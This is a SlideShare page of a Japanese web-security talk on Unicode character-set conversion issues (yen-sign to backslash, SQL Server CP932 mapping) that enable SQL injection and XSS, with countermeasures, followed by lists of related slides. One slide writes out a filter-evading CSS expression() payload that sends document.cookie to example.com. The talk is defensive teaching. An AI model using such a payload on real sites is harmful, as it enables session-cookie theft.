Hiroshi Tokumaru, profile picture
Uploaded byHiroshi Tokumaru
4,744 views

UnicodeによるXSSと SQLインジェクションの可能性

SQL Server使用時の文字コード変換の注意など

Embed presentation

Unicode による XSS と SQL インジェクションの可能性 HASH サルティング株式会社 徳丸 浩
自己紹介
今日は漢字の人です
横浜で ちっちゃな会社 やってます
Web アプリが専門ですが、色々やります
WAF について書いたりしています
それでは始めます
本日のテーマは
文字コード
文字コードって何 ?
文字コード = 文字集合 + 文字エンコーディング
文字エンコーディングネタは結構ある 冗長な UTF-8 エンコーディング パストラバーサルなど 半端な先行バイトによる XSS UTF-7 による XSS Shift_JIS の 5C 問題 しかし
本日のテーマは
文字集合
文字集合って何 ? 文字通り,文字の集まり もじもじ
この辺があやしい
特にやばそうなところ (*1) US-ASCII は 7 ビットのコードなので,最上位ビットを無視する結果, 0x25 すなわち「 % 」として扱われる (*2) 中黒(なかぐろ) 0x5C 0xA5 US-ASCII % (*1) JIS X 0201 ¥ ・ (*2) ISO-8859-1 ¥ Unicode ¥
文字集合を変換すると ?
多対一の変換が起こるかどうかは実装依存 ASP.NET 「 \ 」 U+00A5 -> ? Perl 「 \ 」 U+00A5 -> ? PHP 「 \ 」 U+00A5 -> ¥  ( 全角 ) Java 「 \ 」 U+00A5 -> (0x5C) 注目 10 万超の文字を変換して確認するだけの簡単なお仕事です
U+00A5 による SQL インジェクション (MySQL+JDBC) エスケープ( ' -> ' ' ) Unicode -> EUC-JP
U+00A5 による SQL インジェクション (MySQL+JDBC)
XSS はどうか ?
U+00A5 -> 0x5C の変換による XSS はあり得る
が, JavaScript を動的生成する場合などに限られる
現実的に発生し得るが
そもそも JavaScript の動的生成ってどうよ orz
他にないのか ?
SQL Server の例 SQL Server が Unicode で列の値を保存するための条件 列の型を nchar , nvarchar にする (char , varchar はだめ ) 文字列リテラルを N'....' と記述する ('....' ではだめ ) 上記を怠ると, Unicode->CP932 への変換が起こる
CP932 と断定していいのか ?
非 Unicode への変換が起こっていることは確かだが CP932 と 断定できない orz
SQL Server の例 SQL Server が Unicode で列の値を保存するための条件 列の型を nchar , nvarchar にする (char , varchar はだ め ) 文字列リテラルを N'....' と記述する ( '....' ではだめ ) 上記を怠ると, Unicode->CP932 への変換が起こる っぽい 変換の例 è -> e é -> e ê -> e ë -> e
これをどう活用するか
か,活用かよ orz
悪影響の例 :CSS の XSS 対策
ブラックリスト
XSS 対策が回避されるパターン 元の入力 .main { color: è xp ®éßßïòñ (document.location= ”http://example.com?”+document.cookie); } XSS 対策ルーチンを通るが è xp ®éßßïòñ はフィルタを回避される SQL Server に Insert 。その際に文字コード変換 .main { color: expRession(document.location= ”http://example.com?”+document.cookie); } CSS を使って表示すると, JavaScript が実行され Cookie 値が漏洩する はてなは EUC-JP だから大丈夫 ? (SQL Server でもない )
対策 異なる文字集合への変換を極力しない どうしてもしなければならない場合もある wassr.jp のように, PC 向けは Unicode , 携帯電話向けは Shift_JIS の対応が必要なサイトなど その場合は…
対策 異なる文字集合への変換を極力しない どうしてもしなければならない場合もある wassr.jp のように, PC 向けは Unicode , 携帯電話向けは Shift_JIS の対応が必要なサイトなど その場合は… 続きは Web で ITpro Security で
第 5 回~第 6 回の 5 回で文字コード説明します
ご清聴ありがとうございました

More Related Content

PDF
XSS再入門
byHiroshi Tokumaru
 
PDF
[AWS EXpert Online for JAWS-UG 18] 見せてやるよ、Step Functions の本気ってやつをな
byAmazon Web Services Japan
 
PDF
KafkaとAWS Kinesisの比較
byYoshiyasu SAEKI
 
PDF
アプリ開発で知っておきたい認証技術 - OAuth 1.0 + OAuth 2.0 + OpenID Connect -
byNaoki Nagazumi
 
PDF
20200630 AWS Black Belt Online Seminar Amazon Cognito
byAmazon Web Services Japan
 
PDF
とある診断員とSQLインジェクション
byzaki4649
 
PPTX
Keycloak入門
byHiroyuki Wada
 
PDF
マルチテナント化で知っておきたいデータベースのこと
byAmazon Web Services Japan
 
XSS再入門
byHiroshi Tokumaru
 
[AWS EXpert Online for JAWS-UG 18] 見せてやるよ、Step Functions の本気ってやつをな
byAmazon Web Services Japan
 
KafkaとAWS Kinesisの比較
byYoshiyasu SAEKI
 
アプリ開発で知っておきたい認証技術 - OAuth 1.0 + OAuth 2.0 + OpenID Connect -
byNaoki Nagazumi
 
20200630 AWS Black Belt Online Seminar Amazon Cognito
byAmazon Web Services Japan
 
とある診断員とSQLインジェクション
byzaki4649
 
Keycloak入門
byHiroyuki Wada
 
マルチテナント化で知っておきたいデータベースのこと
byAmazon Web Services Japan
 

What's hot

PPTX
Keycloakのステップアップ認証について
byHitachi, Ltd. OSS Solution Center.
 
PDF
Railsで作るBFFの功罪
byRecruit Lifestyle Co., Ltd.
 
PDF
文字コードに起因する脆弱性とその対策(増補版)
byHiroshi Tokumaru
 
PPTX
Helidon 概要
byオラクルエンジニア通信
 
PDF
こんなに使える!今どきのAPIドキュメンテーションツール
bydcubeio
 
PDF
最近のBurp Suiteについて調べてみた
byzaki4649
 
PDF
人生がときめくAPIテスト自動化 with Karate
byTakanori Suzuki
 
PDF
ログ管理のベストプラクティス
byAkihiro Kuwano
 
PDF
OpenID Connect 入門 〜コンシューマーにおけるID連携のトレンド〜
byMasaru Kurahayashi
 
PDF
Where狙いのキー、order by狙いのキー
byyoku0825
 
PDF
20190814 AWS Black Belt Online Seminar AWS Serverless Application Model
byAmazon Web Services Japan
 
PDF
[AKIBA.AWS] VGWのルーティング仕様
byShuji Kikuchi
 
PDF
マイクロサービス 4つの分割アプローチ
by増田 亨
 
PDF
AWS Black Belt Online Seminar 2018 Amazon DynamoDB Advanced Design Pattern
byAmazon Web Services Japan
 
PDF
例外設計における大罪
byTakuto Wada
 
PDF
【Spring fest 2019】徹底解剖Spring MVCアーキテクチャー
byssuser070fa9
 
PDF
今からでも遅くないDBマイグレーション - Flyway と SchemaSpy の紹介 -
byonozaty
 
PPTX
SPAセキュリティ入門~PHP Conference Japan 2021
byHiroshi Tokumaru
 
PPTX
Bapp Storeを調べてみたよ!
byzaki4649
 
PDF
Security-JAWS #21 Well-ArchitectedなIAMポリシーに挑戦する(改) 〜最小権限の原則を実装ってどゆこと?〜
byTakamasa Ohtake
 
Keycloakのステップアップ認証について
byHitachi, Ltd. OSS Solution Center.
 
Railsで作るBFFの功罪
byRecruit Lifestyle Co., Ltd.
 
文字コードに起因する脆弱性とその対策(増補版)
byHiroshi Tokumaru
 
Helidon 概要
byオラクルエンジニア通信
 
こんなに使える!今どきのAPIドキュメンテーションツール
bydcubeio
 
最近のBurp Suiteについて調べてみた
byzaki4649
 
人生がときめくAPIテスト自動化 with Karate
byTakanori Suzuki
 
ログ管理のベストプラクティス
byAkihiro Kuwano
 
OpenID Connect 入門 〜コンシューマーにおけるID連携のトレンド〜
byMasaru Kurahayashi
 
Where狙いのキー、order by狙いのキー
byyoku0825
 
20190814 AWS Black Belt Online Seminar AWS Serverless Application Model
byAmazon Web Services Japan
 
[AKIBA.AWS] VGWのルーティング仕様
byShuji Kikuchi
 
マイクロサービス 4つの分割アプローチ
by増田 亨
 
AWS Black Belt Online Seminar 2018 Amazon DynamoDB Advanced Design Pattern
byAmazon Web Services Japan
 
例外設計における大罪
byTakuto Wada
 
【Spring fest 2019】徹底解剖Spring MVCアーキテクチャー
byssuser070fa9
 
今からでも遅くないDBマイグレーション - Flyway と SchemaSpy の紹介 -
byonozaty
 
SPAセキュリティ入門~PHP Conference Japan 2021
byHiroshi Tokumaru
 
Bapp Storeを調べてみたよ!
byzaki4649
 
Security-JAWS #21 Well-ArchitectedなIAMポリシーに挑戦する(改) 〜最小権限の原則を実装ってどゆこと?〜
byTakamasa Ohtake
 

Viewers also liked

PPTX
文字コードの脆弱性はこの3年間でどの程度対策されたか?
byHiroshi Tokumaru
 
PDF
今日こそわかる、安全なWebアプリの作り方2010
byHiroshi Tokumaru
 
PDF
CSPの話〜FxOSチューン☆〜
byYu Yagihashi
 
PDF
CSP Lv.2の話
byYu Yagihashi
 
PDF
WAS Forum 2010カンファレンス:ケータイ2.0が開けてしまったパンドラの箱
byHiroshi Tokumaru
 
PDF
phpMyAdminにおけるスクリプト実行可能な脆弱性3種盛り合わせ
byHiroshi Tokumaru
 
PDF
ガラケーで楽しむオレJSの勧め
byHiroshi Tokumaru
 
PDF
徳丸本ができるまで
byHiroshi Tokumaru
 
PDF
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012
byHiroshi Tokumaru
 
PDF
文字コードに起因する脆弱性とその対策
byHiroshi Tokumaru
 
PDF
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2011
byHiroshi Tokumaru
 
PDF
ここが変だよ、グローバルスタンダードの脆弱性対策~入力値の考え方~
byHiroshi Tokumaru
 
PPTX
SecurityとValidationの奇妙な関係、あるいはDrupalはなぜValidationをしたがらないのか
byHiroshi Tokumaru
 
PDF
Rails SQL Injection Examplesの紹介
byHiroshi Tokumaru
 
PDF
安全なPHPアプリケーションの作り方2013
byHiroshi Tokumaru
 
PPTX
脆弱性は誰のせい? PHP、MySQL、Joomla! の責任やいかに
byHiroshi Tokumaru
 
PDF
ログイン前セッションフィクセイション攻撃の脅威と対策
byHiroshi Tokumaru
 
PPTX
PHPカンファレンス2009 - 45分で分かる安全なWebアプリケーション開発のための発注・要件・検収
byHiroshi Tokumaru
 
PPTX
徳丸本に載っていないWebアプリケーションセキュリティ
byHiroshi Tokumaru
 
PDF
いまさら聞けないパスワードの取り扱い方
byHiroshi Tokumaru
 
文字コードの脆弱性はこの3年間でどの程度対策されたか?
byHiroshi Tokumaru
 
今日こそわかる、安全なWebアプリの作り方2010
byHiroshi Tokumaru
 
CSPの話〜FxOSチューン☆〜
byYu Yagihashi
 
CSP Lv.2の話
byYu Yagihashi
 
WAS Forum 2010カンファレンス:ケータイ2.0が開けてしまったパンドラの箱
byHiroshi Tokumaru
 
phpMyAdminにおけるスクリプト実行可能な脆弱性3種盛り合わせ
byHiroshi Tokumaru
 
ガラケーで楽しむオレJSの勧め
byHiroshi Tokumaru
 
徳丸本ができるまで
byHiroshi Tokumaru
 
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2012
byHiroshi Tokumaru
 
文字コードに起因する脆弱性とその対策
byHiroshi Tokumaru
 
徳丸本に学ぶ 安全なPHPアプリ開発の鉄則2011
byHiroshi Tokumaru
 
ここが変だよ、グローバルスタンダードの脆弱性対策~入力値の考え方~
byHiroshi Tokumaru
 
SecurityとValidationの奇妙な関係、あるいはDrupalはなぜValidationをしたがらないのか
byHiroshi Tokumaru
 
Rails SQL Injection Examplesの紹介
byHiroshi Tokumaru
 
安全なPHPアプリケーションの作り方2013
byHiroshi Tokumaru
 
脆弱性は誰のせい? PHP、MySQL、Joomla! の責任やいかに
byHiroshi Tokumaru
 
ログイン前セッションフィクセイション攻撃の脅威と対策
byHiroshi Tokumaru
 
PHPカンファレンス2009 - 45分で分かる安全なWebアプリケーション開発のための発注・要件・検収
byHiroshi Tokumaru
 
徳丸本に載っていないWebアプリケーションセキュリティ
byHiroshi Tokumaru
 
いまさら聞けないパスワードの取り扱い方
byHiroshi Tokumaru
 

Similar to UnicodeによるXSSと SQLインジェクションの可能性

PDF
PostgreSQL Unconference #29 Unicode IVS
byNoriyoshi Shinoda
 
PPTX
Unicode文字列処理
by信之 岩永
 
PDF
文字コード基礎論A
by京大 マイコンクラブ
 
PPTX
文字コードのお話
byShunji Konishi
 
PPTX
JIS2004 with Windows SDK
byKazushi Kamegawa
 
PDF
Unicodeについて教えてgooでしつこくきいてみたよ♪
by1000 VICKY
 
PDF
文字コードとセキュリティ
byKenta Yamamoto
 
PDF
Web技術勉強会 第34回
by龍一 田中
 
PDF
MySQL日本語利用徹底入門
byMikiya Okuno
 
PostgreSQL Unconference #29 Unicode IVS
byNoriyoshi Shinoda
 
Unicode文字列処理
by信之 岩永
 
文字コード基礎論A
by京大 マイコンクラブ
 
文字コードのお話
byShunji Konishi
 
JIS2004 with Windows SDK
byKazushi Kamegawa
 
Unicodeについて教えてgooでしつこくきいてみたよ♪
by1000 VICKY
 
文字コードとセキュリティ
byKenta Yamamoto
 
Web技術勉強会 第34回
by龍一 田中
 
MySQL日本語利用徹底入門
byMikiya Okuno
 

More from Hiroshi Tokumaru

PPTX
ウェブセキュリティのありがちな誤解を解説する
byHiroshi Tokumaru
 
PPTX
脅威分析の手法によりウェブサーバーにウイルス対策ソフトが必要かを検証する
byHiroshi Tokumaru
 
PPT
SQLインジェクション再考
byHiroshi Tokumaru
 
PPTX
徳丸本VMに脆弱なWordPressを導入する
byHiroshi Tokumaru
 
PPTX
introduction to unsafe deserialization part1
byHiroshi Tokumaru
 
PPTX
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
byHiroshi Tokumaru
 
PPTX
XXE、SSRF、安全でないデシリアライゼーション入門
byHiroshi Tokumaru
 
PPTX
ウェブ・セキュリティ基礎試験(徳丸基礎試験)の模擬試験問題
byHiroshi Tokumaru
 
PPTX
オニギリペイのセキュリティ事故に学ぶ安全なサービスの構築法 (PHPカンファレンス2019)
byHiroshi Tokumaru
 
PPTX
Railsエンジニアのためのウェブセキュリティ入門
byHiroshi Tokumaru
 
PPTX
安全なWebアプリケーションの作り方2018
byHiroshi Tokumaru
 
PPTX
秀スクリプトの話
byHiroshi Tokumaru
 
PPTX
デバッガでWordPress本体やプラグインの脆弱性を追いかけてみよう
byHiroshi Tokumaru
 
PPTX
若手エンジニアのためのセキュリティ講座
byHiroshi Tokumaru
 
PPTX
ウェブセキュリティの常識
byHiroshi Tokumaru
 
PDF
著名PHPアプリの脆弱性に学ぶセキュアコーディングの原則
byHiroshi Tokumaru
 
PDF
ウェブアプリケーションセキュリティ超入門
byHiroshi Tokumaru
 
PPTX
ウェブセキュリティの最近の話題早分かり
byHiroshi Tokumaru
 
PPTX
セキュリティの都市伝説を暴く
byHiroshi Tokumaru
 
PPTX
安全なPHPアプリケーションの作り方2016
byHiroshi Tokumaru
 
ウェブセキュリティのありがちな誤解を解説する
byHiroshi Tokumaru
 
脅威分析の手法によりウェブサーバーにウイルス対策ソフトが必要かを検証する
byHiroshi Tokumaru
 
SQLインジェクション再考
byHiroshi Tokumaru
 
徳丸本VMに脆弱なWordPressを導入する
byHiroshi Tokumaru
 
introduction to unsafe deserialization part1
byHiroshi Tokumaru
 
SSRF対策としてAmazonから発表されたIMDSv2の効果と破り方
byHiroshi Tokumaru
 
XXE、SSRF、安全でないデシリアライゼーション入門
byHiroshi Tokumaru
 
ウェブ・セキュリティ基礎試験(徳丸基礎試験)の模擬試験問題
byHiroshi Tokumaru
 
オニギリペイのセキュリティ事故に学ぶ安全なサービスの構築法 (PHPカンファレンス2019)
byHiroshi Tokumaru
 
Railsエンジニアのためのウェブセキュリティ入門
byHiroshi Tokumaru
 
安全なWebアプリケーションの作り方2018
byHiroshi Tokumaru
 
秀スクリプトの話
byHiroshi Tokumaru
 
デバッガでWordPress本体やプラグインの脆弱性を追いかけてみよう
byHiroshi Tokumaru
 
若手エンジニアのためのセキュリティ講座
byHiroshi Tokumaru
 
ウェブセキュリティの常識
byHiroshi Tokumaru
 
著名PHPアプリの脆弱性に学ぶセキュアコーディングの原則
byHiroshi Tokumaru
 
ウェブアプリケーションセキュリティ超入門
byHiroshi Tokumaru
 
ウェブセキュリティの最近の話題早分かり
byHiroshi Tokumaru
 
セキュリティの都市伝説を暴く
byHiroshi Tokumaru
 
安全なPHPアプリケーションの作り方2016
byHiroshi Tokumaru
 

UnicodeによるXSSと SQLインジェクションの可能性